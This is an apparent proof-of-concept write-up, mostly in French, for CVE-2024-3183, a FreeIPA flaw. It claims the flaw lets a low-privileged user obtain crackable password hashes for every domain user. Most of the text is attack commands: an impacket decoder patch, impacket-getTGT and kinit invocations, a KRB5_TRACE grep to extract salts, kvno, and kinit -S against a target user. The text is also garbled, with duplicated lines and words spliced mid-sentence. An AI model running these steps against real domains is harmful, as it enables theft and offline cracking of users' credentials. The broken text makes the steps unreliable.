
POC for CVE-2024-3183 (FreeIPA Rosting)
PoC pour CVE-2024-3183 (FreeIPA Rosting)
Impact : Un utilisateur avec des privilèges faibles peut obtenir un hash des mots de passe de tous les utilisateurs du domaine et effectuer une attaque par force brute hors ligne (kerberoasting).
Correctif pour impacket-getTGT :
decoder.decode.defaultErrorState = stGetValueDecoderByTag à impacket/krb5/kerberosv5.py.decoder.decode.defaultErrorState = stGetValueDecoderByTag à impacket/krb5/kerberosv5.py.-service et l'option -debug pour obtenir le sel en une seule commande.
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - Mots de passe.
kinit -S target useret vous obtenez un TGT qui est chiffré avec la clé de l'utilisateur cible.